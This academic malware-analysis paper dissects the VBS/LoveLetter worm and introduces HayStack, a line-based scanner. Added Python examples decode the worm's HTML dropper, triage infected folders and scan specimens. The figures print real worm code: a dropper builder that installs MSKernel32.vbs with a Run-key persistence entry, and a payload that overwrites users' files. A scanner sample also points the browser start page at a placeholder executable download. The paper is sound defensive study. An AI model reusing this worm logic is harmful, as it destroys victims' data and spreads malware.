8/13/2019 LoveLetter:A Targeted Analysis Using HeyStack
http://slidepdf.com/reader/full/lovelettera-targeted-analysis-using-heystack 1/12
Hoggan 1/12
LoveLetter: A Targeted Analysis Using HeyStack
Written By: Rich Hoggan
Computer and Information Science, Notre Dame de Namur University
Abstract
Malware has become such a global threat to the internet community that malware analysis is
imperative to understanding how to protect against it. This paper discusses the background of the
VBS/LoveLetter worm and walks through an analysis of its source code. Manual passive analysis of
VBS/LoveLetter is conducted alongside runs of HayStack, a custom-built analysis tool.
Area of Focus: Information Technology employees, Cybersecurity employees, Computer Scientists,
Cybersecurity enthusiasts, Reverse Engineers
Keywords: malware analysis, reverse engineering, cybersecurity, computer science
Introduction
From Brain to Flame, computer viruses have been part of computing since its very beginning.
Viruses have been written in many programming languages and have targeted every major operating
system, a set which now includes mobile operating systems. Even with anti-virus protection, the chances
of being infected and victimized by some type of malware continue to grow. Given this growth,
malware analysis is a required tactic for protecting against malware that has progressed from simply
crashing a computer to stealing private information and even financial data.
In this paper we provide a brief background of the VBS/LoveLetter email worm; passive
analysis of VBS/LoveLetter's source code takes up the rest of the paper. We look at the key
characteristics of the worm, the programming language used to write it, its trigger and payload, and
the functionality of its source code. In addition to manual passive analysis, HayStack, a custom-built
analysis tool, is used to pull information out of the specimen, including the registry keys and URLs
referenced in the source code.
A Brief Background of VBS/LoveLetter
VBS/LoveLetter was released into the wild in May of 2000, and the first networks to show a
presence of the worm were in Asia and Europe. It did not take long for VBS/LoveLetter to reach the
United States and every other country connected to the internet. Most notably, the worm managed to
infect computers associated with the Central Intelligence Agency and the Pentagon [1]. Variants began
spreading almost as quickly as the original, most likely because the worm's source code was available
from the moment of its initial release: VBScript is distributed as plain text, so every infected file
carried a readable copy of the worm.
Because the worm spread through email, the trigger was an infected message carrying an
attachment named "LOVE-LETTER-FOR-YOU.TXT.vbs", which the recipient took to be a love letter
from someone in their Outlook address book (the worm mailed itself from the previous victim's
account, so the sender was usually a known contact). Once the user double-clicked the attachment, the
script executed and infected the machine, which in turn activated self-propagation: the worm sent itself
to everyone in the user's Outlook address book and iterated through the user's directories searching for
a number of different file types. Any such files were overwritten with the worm's source code. Because
the originals were overwritten, there was no way to recover them; to recover lost data the user needed
an uninfected external backup. (The one exception, discussed under Payload and Trigger, is MP3 files,
which were hidden rather than overwritten.) Reflecting this outcome, some reports put data loss in the
tens of thousands of dollars [2].
Passive Analysis
A Note on Laboratory Setup
Both manual and automated passive analysis were conducted on a Windows 8.1 machine
running Python 2.7 and the HayStack malware analysis tool. The analysis is passive in the sense that
the specimen was read and scanned but never executed.
Dissecting Virus Components
Programming Language Used
VBS/LoveLetter was written in VBScript, Microsoft's Visual Basic scripting language. While it
has declined in popularity in favour of languages such as Python, VBScript was popular with IT staff
and system administrators because it could handle many kinds of automation tasks. VBScript is an
interpreted language: script files are interpreted line by line by the Windows Script Host, as opposed to
languages such as C, where source code must be passed through a compiler to create an executable file.
Furthermore, a .vbs file executes as soon as it is double-clicked. This meant that when users opened
the attachment, or double-clicked any of the files the worm had overwritten, the worm ran. Two
Windows defaults made this possible: the shell hid known file extensions, so
LOVE-LETTER-FOR-YOU.TXT.vbs was displayed as LOVE-LETTER-FOR-YOU.TXT, and .vbs files
were associated with the script host and run without any confirmation. Even a knowledgeable user had
no way to tell that they were executing a VBScript file rather than opening a text file, short of having
file extensions displayed.
Payload and Trigger
The worm's trigger was the attached VBScript itself. The method worked because the real file
type was hidden from the user: the attachment appeared to be a harmless text file, and when the user
opened it the VBScript ran instead. The worm also wrote an HTML copy of itself,
LOVE-LETTER-FOR-YOU.HTM, in which the entire worm source is embedded as a string inside a
VBScript block. The page asks the viewer to press "YES" to enable ActiveX; if they do, the embedded
script writes MSKernel32.vbs to the system directory (fso.GetSpecialFolder(1)) and registers it under
the HKEY_LOCAL_MACHINE Run key so that it starts with Windows. The file name is chosen to
resemble a legitimate Windows component. The subroutine that generates this file can be seen in
figure 1.
[Figure 1 - HTML trigger generation]
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
' HTML template. The characters ' " / \ are written as #-# @-@ ?-? ^-^ so the
' template can live inside VBScript string literals; dt1..dt6 below resolve them.
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>"&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
' Second half of the embedded script: decode the worm source held in `code`
' ([-[ ]-] %-% back to ' " \), drop it as MSKernel32.vbs and add a Run key.
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
' Resolve the template tokens: #-# -> '  @-@ -> "  ?-? -> /  ^-^ -> \
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
' Read the worm's own source and encode it so it survives inside a VBScript
' string literal: ' " \ become [-[ ]-] %-% and every line is quoted and continued.
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
' Write template head, embedded source, template tail as LOVE-LETTER-FOR-YOU.HTM
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
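The figure shows two layers of substitution. The HTML template in dta1/dta2 carries #-#, @-@, ?-? and ^-^ in place of ' " / \ (resolved by the dt1..dt6 replace calls), and the worm's own source is embedded after code= with [-[, ]-] and %-% in place of ' " \ (applied by the for loop) so that it survives inside a VBScript string literal. The following Python 3 script is an added example, not part of the original paper or of HayStack: it re-implements the loop's encoding, builds a cut-down stand-in for LOVE-LETTER-FOR-YOU.HTM (only the fragments around code= that the d.write calls produce), and recovers the embedded source from it, which is what an analyst wants when handed the .HTM rather than the .vbs. The sample source lines are constructed for the demonstration and are not the worm.

```python
# Tokens the worm substitutes into its own source before embedding it in the
# dropper (the for-loop in figure 1: chr(91)+chr(45)+chr(91) and so on).
EMBEDDED_TOKENS = {"[-[": "'", "]-]": '"', "%-%": "\\"}
# Tokens used in the dta1/dta2 HTML template, resolved by dt1..dt6 in figure 1.
TEMPLATE_TOKENS = {"#-#": "'", "@-@": '"', "?-?": "/", "^-^": "\\"}

CRLF = "\r\n"
CONTINUATION = "&vbcrlf& _"  # VBScript continuation the loop appends to all but the last line
# First line of the resolved dta2; it directly follows the embedded source in the dropper.
END_MARKER = CRLF + 'set fso=CreateObject("Scripting.FileSystemObject")'


def untokenize(text, tokens):
    """Reverse one layer of the worm's token substitution."""
    for token, char in tokens.items():
        text = text.replace(token, char)
    return text


def encode_like_worm(source_lines):
    """Re-implements the for-loop in figure 1: tokenise ' \" \\, wrap each line in
    chr(34) quotes, and append a continuation to every line except the last."""
    last = len(source_lines) - 1
    wrapped = []
    for n, line in enumerate(source_lines):
        for char, token in (("'", "[-["), ('"', "]-]"), ("\\", "%-%")):
            line = line.replace(char, token)
        wrapped.append('"' + line + '"' + ("" if n == last else CONTINUATION))
    return CRLF.join(wrapped)


def build_dropper(source_lines):
    """Constructed stand-in for LOVE-LETTER-FOR-YOU.HTM: the tail of dt5 (ending in
    'code=' with no newline), the embedded lines, a CRLF, then the head of dt6,
    in the order the five d.write calls in figure 1 emit them."""
    head = ('<SCRIPT LANGUAGE="VBScript">' + CRLF + "on error resume next" + CRLF
            + "aw=1" + CRLF + "code=")
    tail = (END_MARKER + CRLF
            + "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))" + CRLF
            + "</SCRIPT>")
    return head + encode_like_worm(source_lines) + tail


def extract_embedded_source(htm):
    """Recover the plain-text worm source from a dropper laid out as above."""
    start = htm.find("code=")
    end = htm.find(END_MARKER, start)
    if start < 0 or end < 0:
        raise ValueError("no embedded code= block found")
    recovered = []
    for piece in htm[start + len("code="):end].split(CRLF):
        if piece.endswith(CONTINUATION):
            piece = piece[:-len(CONTINUATION)]
        if len(piece) >= 2 and piece[0] == '"' and piece[-1] == '"':
            piece = piece[1:-1]          # strip the chr(34) wrapping
        recovered.append(untokenize(piece, EMBEDDED_TOKENS))
    return recovered


# Constructed sample "worm" source (not the real specimen) used for the round trip.
SAMPLE_SOURCE = [
    "rem constructed sample, not the worm",
    "' a comment containing an apostrophe",
    'set fso=CreateObject("Scripting.FileSystemObject")',
    'msgbox "C:\\Windows\\System32"',
]

if __name__ == "__main__":
    htm = build_dropper(SAMPLE_SOURCE)
    for line in extract_embedded_source(htm):
        print(line)
```

On a real dropper the same two steps apply: locate the code= string, then undo the wrapping and the [-[ ]-] %-% tokens. The outer template tokens never appear in the written .HTM, because the html sub resolves them before writing; untokenize with TEMPLATE_TOKENS is only needed when reading the .vbs itself.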
Once the trigger was activated, the worm's payload ran. The payload iterated through the host file
system looking for numerous file types and replacing their contents with the worm's own source
(held in the variable vbscopy). As figure 2 shows, the affected extensions were script and web files
(.vbs, .vbe, .js, .jse, .css, .wsh, .sct, .hta) and images (.jpg, .jpeg). Files of type .vbs and .vbe were
overwritten in place; the other script types and the images were overwritten and then copied to a .vbs
name (page.hta became page.vbs, photo.jpg became photo.jpg.vbs) with the original deleted. The only
caveat is MP3 and MP2 files: a copy named song.mp3.vbs was created beside the original, which was
hidden (attribute +2) rather than overwritten [4], so the audio file is recoverable by clearing the hidden
attribute while the images and scripts are not. Part of this code can be seen in figure 2.
[Figure 2 - part of the code that overwrites files with the worm's source]
' ext is the lower-cased extension of the current file f1; vbscopy holds the worm source
if (ext="vbs") or (ext="vbe") then
' overwrite in place
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
' overwrite, copy to <basename>.vbs in the same folder, delete the original
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
' overwrite, copy to <name>.jpg.vbs, delete the original
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
' write <name>.mp3.vbs beside the original and only set the hidden attribute (+2)
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
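The four branches above leave different traces on disk: .vbs/.vbe files are overwritten in place, the other script types become folderspec\bname.vbs with the original deleted, images become photo.jpg.vbs with the original deleted, and audio files gain a song.mp3.vbs beside an original that is only hidden. The following Python 3 script is an added example, not the paper's or HayStack's code: it walks a directory after an infection and sorts what it finds into recoverable originals, destroyed originals and infected scripts, following that logic. The marker string (taken from the "BAROK VBS - LOVELETTER" literal in figure 1) and the sample directory layout are constructed for the demonstration; a real triage would identify the worm body by hash or a YARA rule rather than one substring.

```python
import tempfile
from pathlib import Path

MEDIA_EXTS = {".jpg", ".jpeg", ".mp3", ".mp2"}
# Teaching shortcut derived from the literals in figure 1; not a robust signature.
DEFAULT_MARKER = "LOVELETTER"


def looks_infected(path, marker):
    """True if the file's first MiB contains the marker (the worm body is a small script)."""
    try:
        with path.open("r", encoding="latin-1", errors="replace") as fh:
            return marker in fh.read(1 << 20)
    except OSError:
        return False


def triage(root, marker=DEFAULT_MARKER):
    """Classify what the overwrite logic in figure 2 left behind under root.

    recoverable       media file still present beside its .vbs copy
                      (the mp3/mp2 branch only set the hidden attribute)
    destroyed         media file whose .vbs copy exists but whose original is gone
                      (the jpg/jpeg branch deleted the original)
    infected_scripts  .vbs/.vbe files now holding the worm (overwritten in place,
                      or the renamed copies of js/jse/css/wsh/sct/hta files)
    Paths are returned relative to root, sorted, with forward slashes.
    """
    root = Path(root)
    report = {"recoverable": [], "destroyed": [], "infected_scripts": []}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in (".vbs", ".vbe"):
            continue
        if not looks_infected(path, marker):
            continue
        original = path.with_suffix("")            # photo.jpg.vbs -> photo.jpg
        if original.suffix.lower() in MEDIA_EXTS:
            bucket = "recoverable" if original.exists() else "destroyed"
            report[bucket].append(original.relative_to(root).as_posix())
        else:
            report["infected_scripts"].append(path.relative_to(root).as_posix())
    for bucket in report.values():
        bucket.sort()
    return report


def build_sample_tree(root):
    """Constructed post-infection layout mirroring the four branches of figure 2."""
    root = Path(root)
    infected = "rem constructed stand-in for the worm body: BAROK VBS - LOVELETTER\n"
    (root / "photo.jpg.vbs").write_text(infected)          # jpg branch: original deleted
    (root / "song.mp3").write_bytes(b"\xff\xfb\x90\x00")   # mp3 branch: original kept (hidden)
    (root / "song.mp3.vbs").write_text(infected)
    (root / "page.vbs").write_text(infected)               # hta branch: renamed copy, original deleted
    (root / "login.vbs").write_text(infected)              # vbs branch: overwritten in place
    (root / "clean.vbs").write_text('msgbox "hello"\n')    # untouched script
    (root / "notes.txt").write_text("not a script\n")


def demo():
    """Build the sample tree in a temporary directory and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return triage(tmp)


if __name__ == "__main__":
    for bucket, paths in demo().items():
        print(bucket, paths)
```

On a real Windows volume the recoverable audio files are restored with attrib -h; the .vbs copies should be quarantined rather than deleted, since each one is a complete, readable copy of the specimen and therefore evidence.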
Found Registry Keys
Running the registry key scan in HayStack brings back the following output.
[Figure 3 - HayStack registry key scan results]
Looking at figure 3, the worm reads the Internet Explorer download directory from the registry
and references an executable called "WIN-BUGSFIX.exe" in that directory. Without already knowing
the history of VBS/LoveLetter, one could only assume that WIN-BUGSFIX.exe is an executable of some
sort; the name alone (a supposed bug fix delivered by a worm) points to an external component, most
likely a trojan horse. Correlations can also be made between code in the worm and the registry keys
referencing MSKernel32.vbs and Win32DLL.vbs. Despite their names, neither is a Windows system
file: both are copies of the worm, named to resemble legitimate Windows components (kernel32,
win32) and dropped into system directories, and the registry keys register them to run at startup.
Figure 1 shows the Run key being written for MSKernel32.vbs.
Found URLs
Considering the suspicions formed by the previous scan, running the URL scan on the source
code strengthens them: as figure 4 shows, there is a URL that serves the same executable file. In
addition, the URLs contain a domain name, skyinet.net, which on investigation belongs to an Internet
Service Provider in Manila, Philippines, consistent with the author credit ("Manila, Philippines") in the
HTML template of figure 1. Once again, without already knowing the history of the worm, this
information points to a probable origin.
[Figure 4 - HayStack URL scan results]
Concluding Thoughts
While much of the information about this worm has been known for some time, the exercise of
analysing previously released malware helps in understanding how such code executes on the host file
system and what steps need to be taken to protect against data loss.
In the case of VBS/LoveLetter, the most important step victims could and should have taken was to
maintain backups of their data, as there was no way to recover overwritten files. The worm's ability to
execute without the user realising that code was about to run was another serious implication. This is
why current versions of Windows show a security warning before running a script file that arrived from
the internet or an email, and why mail clients such as Outlook now block .vbs attachments outright.
Keeping anti-virus signatures up to date is extremely important, as is never trusting an email attachment
unless it has been scanned and, since extension hiding was the enabler here, configuring the shell to
show file extensions. Because malware is constantly growing in complexity these tactics, amongst
others, must become part of basic internet use, as they remain one of the main lines of defence.
Works Cited
[1] Zetter, Kim. "When Love Came to Town: A Virus Investigation." PCWorld, 13 Nov. 2000. Web. Accessed 8 Oct. 2013.
[2] Crouch, Cameron. "Love Letter's Fallout Continues." PCWorld, 5 May 2000. Web. Accessed 8 Oct. 2013.
Appendix A - An Introduction to Using HayStack
Written By: Rich Hoggan
Notre Dame de Namur, Computer and Information Science
Introduction
HayStack was designed as a tool for analyzing malicious code. Instead of manually reading through a
malicious specimen, one can use HayStack to scan it for particular kinds of information more efficiently.
HayStack was designed to conduct the following analyses:
String Scanning
Registry Key Scanning
Function Scanning
URL Scanning
When HayStack runs a particular scan against a malicious specimen, it generates a report file detailing
the results. If a scan finds nothing, a report file is still generated, so a forensic examiner can build a
case for the type of malware being analyzed regardless of the scan results.
Understanding HayStack’s Scanning Characteristics
String Scanning
String scanning is the simplest scan HayStack runs against a malicious specimen: it looks for lines that
include single or double quotes. If a line contains either, it is stored and later sent to the command line
as well as the report file. Note that in VBScript an apostrophe also starts a comment, so this scan
reports comment lines as well as string literals. This can be seen in figure 1.
[Figure 1 - example of string scan]
Registry Key Scanning
Whereas string scanning simply searches for lines containing single and double quotes, registry key
scanning goes a step further by looking for any of the common registry hive prefixes (for example
HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER) that might be referenced in the malicious
code. If a registry key is found, it is stored and passed to the command line as well as to its own report
file. Figure 2 shows what this output might look like.
[Figure 2 - example of registry key scanning]
Function Scanning
Considering that malicious specimens can be written in a variety of languages, it is quite possible that
functions, methods, or sub-routines will have been written to provide the specimen's functionality. It
should be pointed out that the word function here does not refer to the functions built into the
programming language, but to the functions the malware author wrote in that language, such as in the
following listing.
[Listing 1 - example of a function, method, or sub-routine]
public void printHello() {
    System.out.println("Hello World!");
}
As such, HayStack scans for functions by looking for lines of code that contain the most typical function
prototype declarations in the most popular programming languages, including VBScript, JavaScript,
Java, and C/C++. Like the other HayStack scans, this scan also generates its own report file. The
output of a function scan can be seen in figure 3.
[Figure 3 - example of function scan]
URL Scanning
The final scan conducted by HayStack is a URL scan. It looks for any URL in the specimen, since a
URL can indicate an attempted download of an external component such as a trojan horse or similar
malicious specimen. The URLs found are stored and passed to the command line and to the scan's own
report file when the scan completes. This can be seen in figure 4.
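The four scans described above (whose results against the worm are discussed under Found Registry Keys and Found URLs in the main paper) are line-oriented pattern matches, so they are straightforward to reproduce. The following Python 3 script is an added example, not HayStack's own code: it implements string, registry key, function and URL scanning over a constructed specimen written in the style of the worm's main body (the URL, host and variable names are placeholders, not taken from the worm) and renders a report even when a scan finds nothing, as the appendix says HayStack does. The specimen deliberately opens with a comment line so the string scan's known false positive is visible.

```python
import re

# Constructed specimen in the style of the worm's main body; not the worm's code.
SPECIMEN = r'''
' constructed specimen for the scanner, not VBS/LoveLetter
On Error Resume Next
dim fso,regedit,dirsystem,downread
set fso=CreateObject("Scripting.FileSystemObject")
Set regedit = CreateObject("WScript.Shell")
sub main()
regedit.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
downread=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
regedit.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://example.invalid/WIN-BUGSFIX.exe"
end sub
function spreadtoemail()
end function
'''.strip("\n")

# Hive prefix (long or abbreviated) followed by a backslash-separated path, up to a quote.
REGISTRY_RE = re.compile(
    r"""\b(?:HKEY_(?:LOCAL_MACHINE|CURRENT_USER|CLASSES_ROOT|USERS|CURRENT_CONFIG)|HKLM|HKCU|HKCR|HKU|HKCC)\\[^"'\r\n]+"""
)
URL_RE = re.compile(r"""\b(?:https?|ftp)://[^\s"'<>)]+""")
# One prototype pattern per language family: VBScript, JavaScript, Java/C/C++.
FUNCTION_PATTERNS = (
    re.compile(r"^\s*(?:(?:public|private)\s+)?(?:sub|function)\s+(\w+)", re.I),
    re.compile(r"^\s*(?:async\s+)?function\s+(\w+)\s*\("),
    re.compile(r"^\s*(?:(?:public|private|protected|static|final)\s+)*[\w<>\[\]*]+\s+(\w+)\s*\([^()]*\)\s*\{?\s*$"),
)


def scan(specimen):
    """Run the four HayStack-style scans; each result list holds (line number, hit) pairs."""
    results = {"strings": [], "registry_keys": [], "functions": [], "urls": []}
    for no, line in enumerate(specimen.splitlines(), 1):
        # String scan: any line carrying a quote. In VBScript an apostrophe also opens a
        # comment, so comment lines are reported too (the false positive noted in the text).
        if "'" in line or '"' in line:
            results["strings"].append((no, line.strip()))
        for m in REGISTRY_RE.finditer(line):
            results["registry_keys"].append((no, m.group(0)))
        for m in URL_RE.finditer(line):
            results["urls"].append((no, m.group(0)))
        for pattern in FUNCTION_PATTERNS:
            m = pattern.match(line)
            if m:
                results["functions"].append((no, m.group(1)))
                break
    return results


def report(name, hits):
    """Render one scan's report; a report is produced even when there are no hits."""
    lines = [f"== {name} scan: {len(hits)} hit(s) =="]
    lines += [f"line {no}: {hit}" for no, hit in hits] or ["no results"]
    return "\n".join(lines)


if __name__ == "__main__":
    found = scan(SPECIMEN)
    for scan_name in ("strings", "registry_keys", "functions", "urls"):
        print(report(scan_name, found[scan_name]))
```

The registry hits alone show why the scan is useful on this family: a Run key write, a read of the Internet Explorer download directory and a change to the browser start page, which together describe persistence plus a second-stage download. The function scan's third pattern also matches the Java prototype in Listing 1.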
Future Development
Because HayStack is still under development, several factors need to be considered across all of the
scan types. These include:
What gets stored
What gets printed to the screen and the various report files
These factors should be taken into account during initial use, as the scans may produce false positives
and their behaviour will change as development continues.
HayStack currently runs as a command line application written in Python. A web application version is
also in development, which will allow users to create accounts and scan malicious code specimens with
the HayStack tools without using the command line. Furthermore, additional functionality is being added
so that the tool can examine executable files for URLs and similar attributes, including registry keys
and operating system function calls. This will also be developed as a standalone scan type in the
command line version of the tool.